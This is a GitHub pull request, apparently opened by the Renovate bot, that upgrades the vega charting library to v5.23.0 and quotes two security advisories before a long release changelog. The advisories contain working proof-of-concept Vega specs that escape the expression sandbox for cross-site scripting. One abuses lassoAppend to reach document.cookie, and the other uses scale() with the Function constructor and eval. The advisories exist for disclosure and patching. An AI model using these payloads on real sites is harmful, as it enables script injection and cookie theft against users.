Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update dependency vega to v5.23.0 [SECURITY] #78

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Update dependency vega to v5.23.0 [SECURITY] #78

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Mar 24, 2023
edited
Loading

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vega 5.6.0 -> 5.23.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#​006BB4' : '#​939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

Release Notes

vega/vega (vega)

v5.23.0

Compare Source

Changes from v5.22.1:

This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite.

monorepo

  • Update dependencies, including D3 packages.
  • Update rollup config to use .mjs extensions.

vega-canvas

  • Update rollup config.

vega-crossfilter

  • Update rollup config.

vega-dataflow

  • Update rollup config.

vega-encode

  • Update rollup config.

vega-event-selector

  • Update rollup config.

vega-expression

  • Update rollup config.

vega-force

  • Update rollup config.

vega-format

  • Update rollup config.

vega-functions

vega-geo

  • Update rollup config.

vega-hierarchy

  • Update rollup config.

vega-interpreter

  • Update rollup config.

vega-label

vega-loader

  • Update rollup config.

vega-parser

vega-projection

  • Register projections as recognized Vega scales.
  • Update rollup config.

vega-projection-extended

  • Update rollup config.

vega-regression

  • Update rollup config.

vega-runtime

  • Update rollup config.

vega-scale

  • Add registerScale() and isRegisteredScale() methods. (Thanks @​hydrosquall!)
  • Register scales as recognized Vega scales.
  • Update rollup config.

vega-scenegraph

  • Update test cases to match dependency updates.
  • Update rollup config.

vega-schema

  • Make __count__ private from schema, #​3659 (Thanks @​lsh!)
  • Update rollup config.

vega-selections

  • Update rollup config.

vega-statistics

  • Update rollup config.

vega-time

  • Update rollup config.

vega-transforms

  • Update rollup config.

vega-typings

vega-util

  • Update typescript config.
  • Update rollup config.

vega-view

  • Wrap querySelectorAll in Array.from, #​3639 (Thanks @​ravron!)
  • Update rollup config.

vega-view-transforms

  • Update rollup config.
  • Fix autosize="fit-x/y" when legend is larger than plot, #​3474 (Thanks @​stas-sl!)

vega-voronoi

  • Update rollup config.

vega-wordcloud

  • Update rollup config.

vega-cli

  • Update rimraf version, adjust code in response.
  • Update rollup config.

vega

  • Update test scenes to match dependency updates.
  • Update rollup config.

v5.22.1

Compare Source

Changes from v5.22.0:

monorepo

  • Update dependencies.

vega-scenegraph

  • Fix SVG path parser null check. (#​3451).

v5.22.0

Compare Source

Changes from v5.21.0:

docs

  • Add Packed Bubble Chart example. (thanks @​PBI-David!)
  • Improve TimeUnit transform documentation.

monorepo

  • Update dependencies, including D3 ESM packages.
  • Update rollup config to bundle ESM packages for CJS use.
  • Update tests to match new dependencies.
  • Bump minor version numbers for all affected modules.

vega-functions

  • Add lasso selection expression functions. (thanks @​dvmoritzschoefl!)
  • Suppress unsupported expression function arguments.

vega-label

  • Fix to not assume that a label always has some part inside the chart's bounding box. (thanks @​chanwutk!)

vega-scenegraph

  • Fix SVG path close logic. (#​3377)
  • Fix SVG renderer dirty check. (#​3411).
  • Fix SVG path string parser, update tests. (#​3432)
  • Fix SVG mix-blend-mode to use style attribute. (#​3435)

vega-selections

  • Optimize selection functions for ID-only stores. (thanks @​arvind!)

vega-transforms

  • Fix TimeUnit transform updates.

vega-typings

  • Limit type linting to local TypeScript version only. (thanks @​domoritz!)
  • Adjust EventListenerHandler typings. (#​3390)

v5.21.0

Compare Source

Changes from v5.20.2:

monorepo

  • Update dependencies.

vega

  • Update test scenegraphs.

vega-event-selector

  • (Breaking) Change exported method name.

vega-expression

  • (Breaking) Change exported method names.

vega-label

  • Add support for infinite padding, no bounds on label layout. (#​3252)

vega-loader

  • Fix loader so that baseURL is not prepended to data: URLs. (#​3195)
  • Minor refactoring.

vega-parser

  • Update depenencies.

vega-runtime

  • Dead code elimination for runtime expression instantiation.
  • Minor refactoring.

vega-statistics

  • Fix sampleCurve utility to properly scale values in angle subdivision test. (#​3173)

vega-typings

vega-util

  • Allow customization of logger handler. (thanks @​challet!)

v5.20.2

Compare Source

Changes from v5.20.1:

vega-view

  • Fix container initialization bug.

v5.20.1

Compare Source

Changes from v5.20.0:

monorepo

  • Update dependencies.

vega-dataflow

vega-transforms

vega-typings

  • Update typing comments for bindings and projections to fill-in missing Vega-Lite documentation.

v5.20.0

Compare Source

Changes from v5.19.1:

monorepo

  • Update CI configuration. (thanks @​domoritz!)
  • Update build configuration. (thanks @​domoritz!)
  • Update dependencies.

vega

  • Add web test for external element binding.

vega-scenegraph

  • Add early exit for image rendering with zero width or height.

vega-schema

  • Add signal binding to external input element.

vega-typings

  • Add signal binding to external input element.

vega-util

  • Update inherit utility to use defineProperty, avoids upsetting configurations that ban assignment overrides of Object prototype properties. (#​3109, thanks @​erights!)

vega-view

  • Add signal binding to external input element.

v5.19.1

Compare Source

Changes from v5.19.0:

vega-schema

  • Fix schema generator for data transforms.

v5.19.0

Compare Source

Changes from v5.18.0:

vega-functions

  • Add pluck expression function. (thanks @​arvind!)
  • Add additional Vega-Lite selection helper methods. (thanks @​arvind!)

vega-parser

  • Fix signal check for data source values property. (thanks @​domoritz!)

vega-scenegraph

vega-schema

vega-selections

  • Add additional Vega-Lite selection helper methods. (thanks @​arvind!)

v5.18.0

Compare Source

Changes from v5.17.3:

vega

vega-functions

  • Update vega-selections dependency.

vega-selections

  • Add Vega-Lite v5 "point" selection support. (thanks @​arvind!)

v5.17.3

Compare Source

Changes from v5.17.2:

vega-expression

  • Remove unsafe replace function. (#​3027)

vega-functions

  • Add replace function with input type check. (#​3027)

vega-parser

  • Update dependencies.

vega-view

  • Update dependencies.

v5.17.2

Compare Source

Changes from v5.17.1:

vega-expression

  • Remove unsafe sequence functions. (#​3027)

vega-functions

  • Add sequence functions with input type checks. (#​3027)

vega-parser

  • Update dependencies.

vega-schema

vega-selections

  • Update dependencies.

vega-view

  • Update dependencies.

v5.17.1

Compare Source

Changes from v5.17.0:

vega-geo

vega-expression

  • Fix XSS vulnerability in expression parser and code generator. (#​3018)

vega-typings

  • Remove incorrect comment for Interpolate type.

v5.17.0

Compare Source

Changes from v5.16.1:

vega-canvas

  • Fix browser index route for ES modules. (#​2907)

vega-loader

  • Add iterable support to JSON loader. Iterable inputs are expanded to arrays, then ingested.
  • Fix browser index route for ES modules. (#​2907)

vega-util

  • Add isIterable utility.

v5.16.1

Compare Source

Changes from v5.16.0:

monorepo

  • Fix rollup config to use umd rather than iife bundles. (#​2896)

v5.16.0

Compare Source

Notable Changes
  • The new label transform automatically positions labels without overlapping other marks. (Thanks @​chanwutk!)
  • Completes the transition to using vega-datasets 2.0+, including swapping out the Iris dataset for a more adorable Penguins dataset. 🐧
  • Major update of build system to use a centralized rollup configuration. (Thanks @​domoritz!)
Changelog

Changes from v5.15.0:

docs

monorepo

  • Complete transition to vega-datasets 2.0.
  • Use centralized rollup config. (thanks @​domoritz!)

vega

  • Use centralized rollup config. (thanks @​domoritz!)
  • Update and extend test specifications.

vega-canvas

vega-crossfilter

vega-dataflow

vega-encode

vega-event-selector

vega-expression

  • Use forbidden / allowed, remove blacklist / whitelist (Breaking change)
  • Fix use of var, prefer const and let. (thanks @​lgrammel!)
  • Use centralized rollup config. (thanks @​domoritz!)

vega-functions

vega-force

vega-format

vega-geo

vega-hierarchy

vega-interpreter

vega-label

  • 1.0.0 release, now integrated into Vega! (thanks @​chanwutk!)
  • Fix use of var, prefer const and let. (thanks @​lgrammel!)
  • Use centralized rollup config. (thanks @​domoritz!)

vega-loader

vega-parser

vega-projection

vega-projection-extended

vega-regression

vega-runtime

vega-scale

vega-scenegraph

vega-schema

vega-selections

vega-statistics

vega-time

vega-transforms

vega-typings

vega-util

vega-view-transforms

vega-view

vega-voronoi

vega-wordcloud

v5.15.0

Compare Source

Changes from v5.14.0:

monorepo

  • Update dependencies, including use of D3 v6 packages.
  • Refactor all packages for JavaScript modernization. (thanks @​domoritz & @​lgrammel!)

vega

  • Update vega-core build to use D3 v6.

vega-scale

v5.14.0

Compare Source

Notable Changes
  • Update SVG rendering to produce fully compliant XML. (#​2672)
  • Major refactoring of the Vega code to be more lean and modern. The main changes are:
    • Use shorthand property method syntax (e.g., rather than assignment to prototype objects).
    • Use arrow functions rather than function declarations where appropriate.
    • Prefer use of let and const to var.
  • Upgrade the documentation examples to use vega-datasets 2.0+, including swapping out the Iris dataset for a more adorable Penguins dataset. 🐧
  • Various bug fixes, documented below.
Changelog

Changes from v5.13.0:

vega-cli

  • Update SVG test output.

vega-canvas

  • Update to use leaner syntax.

vega-crossfilter

  • Update to use leaner syntax.

vega-dataflow

  • Fix EventStream to support detach method. (#​2753)
  • Fix Pulse addAll to clear rem set when applicable. This prevents tuple removal from being invoked on newly instantiated operators that never observed those tuples in the first place. (#​2605)
  • Update to use leaner syntax.

vega-encode

  • Update to use leaner syntax.

vega-event-selector

  • Update to use leaner syntax.

vega-expression

  • Update to use leaner syntax.

vega-force

  • Update to use leaner syntax.

vega-format

  • Update to use leaner syntax.

vega-functions

  • Update to use leaner syntax.

vega-geo

  • Update to use leaner syntax.

vega-hierarchy

  • Update to use leaner syntax.

vega-label

  • Update to use leaner syntax.

vega-loader

  • Update to use leaner syntax.

vega-parser

  • Fix production rule support for guides. (#​2754)
  • Update to use leaner syntax.

vega-projection

  • Update to use leaner syntax.

vega-regression

  • Update to use leaner syntax.

vega-scale

  • Update to use leaner syntax.

vega-scenegraph

  • Add markup and serializeXML utilities for SVG string output. Ensure proper XML output. (#​2672)
  • Fix leaky SVG scaleX/Y transforms on non-path marks. (#​2738)
  • Fix bounds calculation for rotated paths. (#​2780)
  • Fix canvas picking for clipped groups with corner radius and no fill. (#​2797)
  • Fix SVG path parsing: support concatenated decimals and implicit lineTo commands. (#​2803)
  • Update tests, add xmllint checks to test conformance of SVG output.
  • Update to use leaner syntax.
  • Internal Breaking Change: Update SVGStringRenderer class methods to use markup utility.
  • Internal Breaking Change: Drop openTag, closeTag utilities.

vega-statistics

  • Update to use leaner syntax.

vega-time

  • Update to use leaner syntax.

vega-transforms

  • Update to use leaner syntax.

vega-view-transforms

  • Update to use leaner syntax.

vega-view

  • Update to use leaner syntax.

vega-util

  • Add members argument to inherits utility.
  • Add ascending comparator utility.
  • Update to use leaner syntax.

vega-voronoi

  • Update to use leaner syntax.

vega-wordcloud

  • Update to use leaner syntax.

v5.13.0

Compare Source

Notable Changes

  • Improved Streaming Performance.

    For performance, Vega caches a lot of internal data structures, including calculated tuples, scenegraph items, and SVG DOM nodes. Previously, nested scopes (such as those created for facetted data) that result in vega-runtime subcontexts were never cleaned. If no external View API calls are made, this is fine, and actually improves performance for interaction-driven dynamic filtering. However, when providing streaming data to Vega through the View API, uncleaned caches and subcontexts can result in substantial memory leaks that also eventually degrade performance.

    This version adds mechanisms for clearing caches and detaching subflows to support streaming data within nested specifications. When input data is removed via a View API call or via signal-valued URL, Vega will now by default trigger garbage collection to reclaim resources. This behavior can be disabled by calling clean(false) on a constructed ChangeSet passed to the View API.

  • Improved Cursor Performance.

    Previously Vega updated the cursor style on the HTML document body. This persists cursor settings even during interactions (such as drags) that may leave the Vega View component. However, it also can result in large performance penalties in Chrome, which re-evaluates CSS styles in response. This version changes the default behavior to set the cursor locally on the Vega View component. If a global cursor is desired, the boolean config property events.globalCursor can be set true or the View method globalCursor can be invoked to change the setting at runtime.

  • Optional Expression Interpreter.

    This release adds interpreter support for Vega expressions that is Content Security Policy (CSP) compliant. By default, the Vega parser performs code generation for parsed Vega expressions, and the Vega runtime uses the Function constructor to create JavaScript functions from the generated code. Although the Vega parser includes its own security checks, the runtime generation of functions from source code nevertheless violates security policies designed to prevent cross-site scripting.

    This release provides an interpreter plug-in (the new vega-interpreter package) that evaluates expressions by traversing an Abstract Syntax Tree (AST) for an expression and performing each operation in turn. Use of the interpreter enables compliance with CSP, but can incur a performance penalty. In tests of initial parse and dataflow evaluation times, the interpreter is on average ~10% slower. Interactive updates may incur higher penalties, as they are often more expression-heavy and amortize the one-time cost of Function constructor parsing.

Changelog

Changes from v5.12.3:

vega

  • Update stream.html and stream-nested.html performance test pages.

vega-dataflow

  • Add detach method to Operator to remove adjacent edges (listeners) from the dataflow graph.
  • Add clean setter to ChangeSet, set to true by default if any tuples are removed.
  • Add clean getter/setter to Pulse, propagate value to forked pulses if they share a data source.
  • Update logging calls during Dataflow evaluation.

vega-encode

  • Update DataJoin transform to clean internal map when pulse.clean() is true.
  • Update Scale to include domainMid as an extrema if it exceeds the domain min or max. (#​2656)

vega-functions

  • Fix scale function to not special case undefined input. This ensures identical semantics with the internal _scale helper function used by code-generated encoders.

vega-geo

  • Update d3-geo dependency.

vega-interpreter

  • Add new vega-interpreter package.

vega-projection

  • Update d3-geo dependency.

vega-projection-extended

  • Update vega-projection dependency.

vega-runtime

  • Add runtime detach method to remove subcontexts. Export as detachSubflow on the head operator of a generated subflow.
  • Add pluggable expression evaluators.

vega-statistics

  • Fix numbers utility to exclude empty string.

vega-transforms

  • Update Aggregate transform to clean internal map when pulse.clean() is true.
  • Update Facet, PreFacet, and Subflow transforms to prune subflows in response to pulse.clean().
  • Update Load transform to set pulse.clean(true) when removing loaded data.
  • Fix Bin and Extent to treat empty string as a missing value. (thanks @​domoritz!)
  • Fix aggregate ops to treat empty string as a missing value.

vega-typings

  • Add eventConfig.globalCursor to config typings.
  • Add dataflow logger to typings.
  • Add parse options to typings.

vega-util

  • Refactor code for fastmap and visitArray utilities.

vega-view

  • Add View constructor option expr to pass in a custom expression evaluator.
  • Add globalCursor method and event configuration.
  • Update to make the Vega view container the default cursor target.

v5.12.3

Compare Source

Notable Changes

The previous Vega v5.12.0 release introduced changes to how SVG was generated, including the addition of an internal stylesheet. However, this leads to integration issues with downstream tools (including at least one popular SVG optimizer) that do not support stylesheet parsing. In addition, local performance tests indicate faster rendering in Chrome when using presentation attributes instead of CSS styling. This version (v5.12.3) now changes the SVG output to favor presentation attributes (fill="blue") over CSS style (style="fill: blue;").

CSS styles have been removed in all but one case: the use of image-rendering for non-smoothed images, where browser differences require multiple style definitions to appease both Chrome and Firefox, something we can't express with presentation attributes alone. If and when Firefox properly supports image-rendering: pixelated we can consider dropping this last use of CSS.

Note that external stylesheets can still be used to style Vega SVG content, and may now have higher specificity due to the use of attributes.

Changelog

Changes from v5.12.2:

monorepo

  • Update eslint config to flag trailing commas.

vega

  • Add initialization timing to test spec viewer page.
  • Remove dangling commas.
  • Update dev dependencies.

vega-cli

  • Update SVG test cases.

vega-format

  • Remove dangling commas.

vega-geo

  • Remove dangling commas.

vega-hierarchy

  • Remove dangling commas.

vega-parser

  • Fix trailing function argument commas in axis utils. (#​2645, thanks @​armanozak!)
  • Remove dangling commas.

vega-projections-extended

  • Update dev dependencies.

vega-scenegraph

  • Favor SVG presentation attributes over CSS style. (#​2640)
  • Fix clipped group picking for canvas. (#​2600)
  • Remove dangling commas, other code clean-up.

vega-schema

  • Remove dangling commas.

vega-time

  • Remove dangling commas.

vega-transforms

  • Remove dangling commas.

v5.12.2

Compare Source

Changes from v5.12.1:

vega-scenegraph

  • Add canvas handler event listeners necessary for state management. Fixes a regression introduced in v5.12.1. (#​2641)

vega-typings

  • Fix typings for locale specification and View API. (thanks @​haldenl!)

v5.12.1

Compare Source

Changes from v5.12.0:

monorepo

  • Switch from Travis CI to GitHub Actions. (thanks @​domoritz!)

vega-cli

  • Add tests for vega-cli.

vega-parser

  • Update code style for config constants.

vega-scenegraph

  • Add class to svg root group, localize SVG stylesheet to that class. (#​2618)
  • Lazily register CanvasHandler event listeners. By avoiding unneeded listeners, this change avoids a number of passive listener violation warnings. (#​2621)

vega-transforms

  • Fix regression of string to number conversion in aggregate sum op. (thanks @​haldenl!)

vega-typings

  • Update View typings.
  • Fix missing color schemes in typings. (thanks @​domortiz!)

vega-view

  • Code clean up.

v5.12.0

Compare Source

Notable Additions
  • View-specific locale management for number and date formatting. The View constructor accepts a locale option, and Vega specs support a config.locale property. Locale objects should have number and/or time properties that map to valid d3-format or d3-time-format locale definitions.
  • View toCanvas now accepts an externalContext option to draw into a separately managed canvas instance. For example, one could draw multiple Vega views into the same node-canvas instance for server-side PDF document generation.
  • Initial support for signal-valued axis orient properties. This addition allows the position of an axis (e.g., left versus right) to be dynamically updated at runtime. The feature should be considered experimental; subtle bugs may still arise.
  • Internal refactoring to support content security policy (CSP) in the future. The Vega parser accepts an ast option flag to include generated abstract syntax trees for expressions in the parser output. All Function constructor use for generated code is now consolidated into a single file in the vega-runtime package and could be overridden if an expression AST interpreter is implemented.
  • Bug fixes! See below...
Changelog

Changes from v5.11.1:

vega

  • Update bar-time test specification to test locale config usage.
  • Update budget-forecasts test specification.
  • Update to use refactored runtime context.

vega-cli

  • Update to use locale view constructor option.

vega-dataflow

  • Add locale property to set a dataflow-specific locale for number and date formatting.

vega-encode

  • Update to use centralized locale management. Transforms now access the dataflow-specific locale via the input pulse.

vega-expression

  • Fix handling of this global variable.

vega-format

  • New package for format methods that centralizes locale management.

vega-functions

  • Add centralized locale management. Format functions now access the dataflow-specific locale via the runtime context object, available to expression functions via the this context.
  • Add and export expression parser, support AST export option.
  • Add internal scale functions for use by encoders.
  • Fix scale dependencies: non-literal scale references should depend on all scales.

vega-geo

  • Fix contour, density2D size setter input checks.

vega-loader

  • Add UTC parser parameter to read method.
  • Use the default locale when custom time format parsers are not provided.

vega-parser

  • Internal breaking change: Output runtime specification has changed the encoding of parsed expression functions. Generated code is now wrapped in an object and stored in the code property.
  • Internal breaking change: Generated expression code no longer includes method variable definitions or additional logic. These have been moved to vega-runtime.
  • Add signal support for axis translate property. (Thanks @​haldenl!)
  • Add experimental signal support for axis orient property. (Thanks @​haldenl!)
  • Add parsing of locale config, include in runtime spec output.
  • Add options argument to parse.
  • Add boolean ast parse option to enable AST output from expression parser.
  • Refactor to use expression parser for synthesized encoder logic.
  • Fix circular dependencies.

vega-runtime

  • Internal breaking change: The runtime now assumes the updated vega-parser output format. All code generation beyond standard expression parser output has now been consolidated into the runtime parsing process.
  • Propagate locale config to runtime context object.
  • Refactor code, add optimized code generation for accessors and comparators.
  • Refactor all non-standard code generation to the runtime context.
  • Fix circular dependencies.

vega-scale

  • Internal breaking change: Update to use centralized locale management. Formatting methods now require a locale parameter as the first argument.
  • Fix valid tick method to sort ticks based on scale range values. (#​2579)

vega-scenegraph

  • Add externalContext CanvasRenderer option. (Thanks @​pixelspark!)
  • Add resetSVGDefIds to reset gradient and clip id counter. (Thanks @​kanitw!)
  • Add SVG style block, set default fill and miter limit values. (#​2498)
  • Update SVG test outputs.
  • Update to use centralized locale management. The ARIA caption generators access the dataflow-specific locale via the runtime context object.
  • Update reference to axis orient.
  • Fix SVG radial gradient pattern fill to use style, not fill attribute.
  • Fix ampersand escape in SVG attributes. (#​2608)
  • Fix CSS fill inherit for tspan.

vega-schema

  • Add axis translate signal support to schema.
  • Add signal-valued axis orient to schema.

vega-time

  • Internal breaking change: Remove formatting methods, which are now part of vega-format.

vega-transforms

  • Update aggregation ops to no longer use the Function constructor.
  • Update dependencies.

vega-typings

  • Add externalCanvas render option to typings.
  • Add axis translate signal support to typings.
  • Add signal-valued axis orient to typings.

vega-util

  • Update field, key, and compare methods to no longer use the Function constructor.
  • Add optional arguments to inject optimized code generators for accessors and comparators.

vega-view

  • Add locale input options and config handling.
  • Update to use refactored runtime context.

vega-view-transforms

  • Add signal support for axis translate property.
  • Update reference to axis orient.
  • Fix ViewLayout reflow to ensure group bounds are updated. (#​2568)
  • Fix grid layout calculations with empty grid input. (#​2541)

vega-wordcloud

  • Update dependencies.

v5.11.1

Compare Source

Changes from v5.11.0:

monorepo

  • Update dev dependencies.

vega-hierarchy

  • Update tests for tape 5.0.

vega-scenegraph

  • Use single quotes for generated aria-label captions. (Thanks @​sprmn!)
  • Escape double quotes in SVG attributes, add test case.

vega-statistics

  • Update tests for tape 5.0.

vega-view-transforms

  • Update tests for tape 5.0.

v5.11.0

Compare Source

Notable Additions
  • Preliminary support for ARIA accessibility attributes in SVG output. Mark and guide definitions now include automatically-generated roles and labels, which can be customized using description and aria properties. Individual mark items do not include ARIA attributes by default (which helps prevent bloat of both the scenegraph and output SVG), but these can be added using description and aria encoding channels.
  • Improve generated HTML form elements for signal bindings. Deployments that use custom CSS for styling bound elements may wish to make minor adjustments.
  • dayofyear time unit support for the timeunit transform.
  • dayofyear, week, utcdayofyear, and utcweek expression functions.
  • Axis domainCap, gridCap, and tickCap properties.
Changelog

Changes from v5.10.1:

monorepo

  • Add ARIA attribute generation documentation.
  • Update eslint setup, consolidate configuration.
  • Update dev dependencies.

vega

  • Add calendar test specification.
  • Add overview-detail-bins test spec to test suite.
  • Update crossfilter test scenes to include description property output.

vega-encode

  • Move internal tick, label utilities to vega-scale.
  • Fix valid tick check calculation. (#​2531)

vega-functions

  • Add dayofyear, week, utcdayofyear, utcweek expression functions.

vega-geo

  • Fix density utility size input checking bug.

vega-parser

  • Add ARIA attribute generation for marks and guides via aria and description properties.
  • Add backing scale names to axis, legend datum objects.
  • Add zindex support for guide config.
  • Add axis domainCap, gridCap, and tickCap properties. (Thanks @​kanitw!)

vega-scale

  • Add tick, label guide utilities from vega-encode.
  • Add domainCaption utility.
  • Fix overflow with large domain and small tickMinStep (#​2550, thanks @​rwoollen!)

vega-scenegraph

  • Add ARIA attribute generation to SVG renderers:
    • Parent <g> tags for mark items include automatic role and aria-roleDescription attributes.
    • Parent <g> tags for axes and legends include automatic aria-label captions.
    • Attribute generation for mark and guide definitions can be customized using the aria and description properties. If aria is false, the content is hidden from the accessibility tree by setting aria-hidden SVG attribute. The description property determines the aria-label SVG attribute.
    • Individual mark items do not include ARIA attributes by default, but these can be added using the encoding channels aria and description. If a description is provided and aria !== false, then Vega will generate accompanying role and aria-roledescription attributes for a mark item.
  • Provide experimental ariaRole and ariaRoleDescription encoding channels for individual marks, which override the default role and aria-roledescription attributes generated by Vega. However, note that these are experimental features and so may change at a later date.

vega-schema

  • Add ARIA accessibility properties to mark, guide, and encode schemas.
  • Add axis domainCap, gridCap, and tickCap properties.

vega-time

  • Add dayofyear time unit support and corresponding tests.
  • Add dayofyear, week, utcdayofyear, utcweek utility functions.
  • Add export for TIME_UNITS array of valid time unit strings.

vega-transforms

  • Update TimeUnit transform parameter schema to enforce valid time unit strings.

vega-typings

  • Add ARIA accessibility properties to mark, guide, and encode typings.
  • Add dayofyear option to TimeUnit transform typings.
  • Add zindex support for guide config.
  • Add axis domainCap, gridCap, and tickCap properties.

vega-view

  • Improved semantic HTML for generated signal bindings to form input elements.

v5.10.1

Compare Source

Changes from v5.10.0:

vega-encode

  • Update default guide label format to support multi-line arrays. (#​2456)

vega-loader

  • Use startsWith rather than indexOf for string prefix checks.

vega-parser

  • Use startsWith rather than indexOf for string prefix checks.
  • Set default fill and size for trail mark config.

vega-transforms

  • Fix window operator init state for prev_value and next_value. (#​2475.)

vega-typings

  • Update mark config for arc mark.

vega-view-transforms

  • Fix Overlap transform to early exit when there are no items (#​2449).

v5.10.0

Compare Source

Notable Additions
  • The Vega parser now generates a built-in background signal which the view uses to set the background color. While not technically a breaking change (specs will still parse and evaluate successfully), existing specs that use a signal named "background" may not render the same as before, in which case a different signal name should be used.
  • Top-level properties (autosize, background, padding, width, height) accept signal references, such as {"signal": "<expr>"}, which map to a signal definition's update property. If the top-level signals array contains an entry that matches one of these properties, the definitions will be merged, with precedence given to the properties defined in the signals array.
  • Vega views now include ARIA attributes on the view container DOM element. The role attribute is set to "figure", and the aria-label attribute is set to the specification description property.
  • The aggregate and window transforms support the product operation to multiply values.
  • The config supports a top-level lineBreak option for setting a global default for text line breaks. This property should be a string or regexp value, or a corresponding signal reference.
  • Support for text baseline values line-top and line-bottom. These values are similar to top and bottom baselines, but calculated relative to the lineHeight rather than fontSize alone.
  • Support for color blend modes via the new blend encoding channel. The allowed values are: multiply, screen, overlay, darken, lighten, color-dodge, color-burn, hard-light, soft-light, difference, exclusion, hue, saturation, color, luminosity. For Canvas rendering, the blend is set via the context 2D globalCompositeOperation property. For SVG rendering, the blend is set via the CSS mix-blend-mode style. The default Vega value is null (or undefined), which maps to the default values "source-over" (for Canvas) and "normal" (for SVG). For more, see the Canvas globalCompositeOperation and CSS mix-blend-mode documentation, including limitations in cross-browser support.
  • Support for configuration of cross-origin image handling. Vega uses crossOrigin="anonymous" by default for loaded images, which allows images loaded from a different host to be included in exported visualization images (and thereby avoid "tainted canvas errors"), so long as the server provides permission via proper CORS headers. This default can be overridden by providing loader options to the Vega view that include a crossOrigin property. If this property is defined and maps to a value of null or undefined, then a no-cors fetch will be performed instead.
  • Add axis labelOffset property to adjust axis label position in addition to tickOffset, and labelLineHeight to set the l

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@renovate renovate bot force-pushed the renovate/npm-vega-vulnerability branch from 5718c91 to 9db708b Compare April 17, 2023 10:57
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
dependencies vulnerability
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants